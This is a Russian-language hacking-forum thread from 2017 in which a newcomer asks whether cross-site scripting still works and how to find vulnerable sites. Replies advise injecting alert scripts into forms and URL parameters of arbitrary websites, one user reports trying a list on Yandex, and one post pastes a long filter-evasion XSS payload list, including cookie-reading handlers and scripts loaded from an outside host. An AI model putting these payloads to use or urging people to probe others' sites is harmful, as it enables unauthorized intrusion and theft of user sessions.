XSS. И снова здравствуйте

Discussion in 'Песочница' started by hells_bells, 6 Sep 2017.

  1. hells_bells

    hells_bells New Member

    Joined:
    6 Sep 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую в моей первой теме!
    Если быть кратким, то меня интересует парочка вопросов касательно XSS уязвимости:

    - Видел на форуме много тем о XSS, но большинство из них были открыты очень давно(по меркам Web`а), как вы считаете - является ли XSS уязвимость актуальной и по сей день или нет?

    - Если же XSS актуальна, можете ли вы поделиться своим опытом поиска уязвимых сайтов?(поверьте, прежде чем задавать этот вопрос сюда, сам перелопатил кучу гору сайтов - безуспешно)
     
  2. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    170
    Likes Received:
    99
    Reputations:
    2
    Конечно! таких сайтов дохуя!
    Ищи на сайтах формы для ввода каких-то данных и потом ищи их отображение на странице. Лезь в исходный код страницы и ищи как в html выводятся введенные тобой данные.
    Если говорить о пассивных xss, то в адресной строке браузера должно быть нечто вроде http://site.com/?search="..."
    в качестве параметра подставляй
    Code:
    <script>alert()</script>
    или сначала тег закрывай "/> а потом алерт()

    Active XSS часто встречаются на сайтах, где есть регистрация и личный кабинет. В разные поля можно подставлять алерт, некоторые поля могут выводиться без фильтрации.
     
    hells_bells likes this.
  3. tester211

    tester211 New Member

    Joined:
    29 Aug 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Это наверное самая интересная штука, которая позволяет что то воровать ;)
     
  4. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Где-то слышал что сейчас браузеры лочат ХХС
     
  5. Logol

    Logol New Member

    Joined:
    29 Oct 2016
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    они не могу его блочить так как для выполнения xss нужен js А БЕЗ сайты не работают)
     
  6. Logol

    Logol New Member

    Joined:
    29 Oct 2016
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    мой маленький набор
    Code:
    '';!--"<XSS>=&{()}
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
    <a onmouseover="alert(document.cookie)">xxs link</a>
    
    or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
    
    <a onmouseover=alert(document.cookie)>xxs link</a>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=# onmouseover="alert('xxs')">
    <IMG SRC= onmouseover="alert('xxs')">
    <IMG onmouseover="alert('xxs')">
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
    &#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
    #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav    ascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
    <IMG SRC=" &#14;  javascript:alert('XSS');">
    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
    <SCRIPT SRC=//ha.ckers.org/.j>
    <IMG SRC="javascript:alert('XSS')"
    <iframe src=http://ha.ckers.org/scriptlet.html <
    \";alert('XSS');//
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <BODY BACKGROUND="javascript:alert('XSS')">
    <IMG DYNSRC="javascript:alert('XSS')">
    <IMG LOWSRC="javascript:alert('XSS')">
    <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
    <IMG SRC='vbscript:msgbox("XSS")'>
    <IMG SRC="livescript:[code]">
    <BODY ONLOAD=alert('XSS')>
    <BGSOUND SRC="javascript:alert('XSS');">
    <BR SIZE="&{alert('XSS')}">
    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
    <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
    <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    <XSS STYLE="xss:expression(alert('XSS'))">
    ¼script¾alert(¢XSS¢)¼/script¾
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
    <TABLE BACKGROUND="javascript:alert('XSS')">
    <TABLE><TD BACKGROUND="javascript:alert('XSS')">
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
    <DIV STYLE="width: expression(alert('XSS'));">
    <BASE HREF="javascript:alert('XSS');//">
    <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    <? echo('<SCR)';
    echo('IPT>alert("XSS")</SCRIPT>'); ?>
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
    
     
    Za4emmne and Gorev like this.
  7. StarkMP

    StarkMP New Member

    Joined:
    13 Oct 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
     
  8. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Да, хотя вектора можно ещё придумать
     
  9. StarkMP

    StarkMP New Member

    Joined:
    13 Oct 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
     
  10. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Возможно, на mail.ru раньше было много, но эксплуатировать сложновато стало, браузеры блочат, надо искать новые вектора и обходы.
     
  11. Logol

    Logol New Member

    Joined:
    29 Oct 2016
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    я забросил это дело.
    т.к. толку от них мало стало если даже и найдешь.

    если есть желание и прямые руки, можно набрать очень большую базу кодов.
    Найти можно, но вот правильно ее использовать или заточить под твои нужны или мысли это уже сложнее.
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Почему мало? С ними можно сделать что угодно от имени юзера.

    Могут и давно делают это. Если браузер видит, что юзер отправил какой-то JS-код и этот код появился в ответе сервера, его заблокируют.
     
    z3u5 likes this.
  13. Logol

    Logol New Member

    Joined:
    29 Oct 2016
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    Там где мне нужно xss уже не работает) А если что и работает то смысла нет)))))))))
    Все пофиксили уже почтовики)
     
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Люди постоянно находят новые баги. Сливают базы крупнейших сайтов. А ты говоришь, что почтовики пофиксили все XSS. Не верю. Значит плохо искал.
     
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    фундаментальные уязвимости внедрения кода( привет buffer overflow ) никогда не исчезнут, они были есть и будут, не взирая на стек технологий, протокол и способы обмена информацией, они сука вота :D
    вопрос сколько тебе не жалко времени на всё это)
     
    _________________________
  16. Logol

    Logol New Member

    Joined:
    29 Oct 2016
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    Вот это да! согласен на все 10000%
    Времени очень много занимает это все.
    Для моих нужд - это того не стоит теперь)

    А для тех кто любит и нравиться ковыряться всегда будет успех)